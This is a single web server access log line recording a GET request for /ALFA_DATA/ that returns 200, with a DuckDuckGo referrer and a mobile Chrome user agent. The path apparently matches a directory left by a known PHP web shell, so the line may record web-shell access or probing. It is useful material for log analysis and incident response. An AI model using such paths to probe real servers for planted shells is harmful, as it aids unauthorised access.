172.71.110.163 - - [06/Dec/2025:03:33:07 +0100] "GET /ALFA_DATA/ HTTP/1.0" 200 63847 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
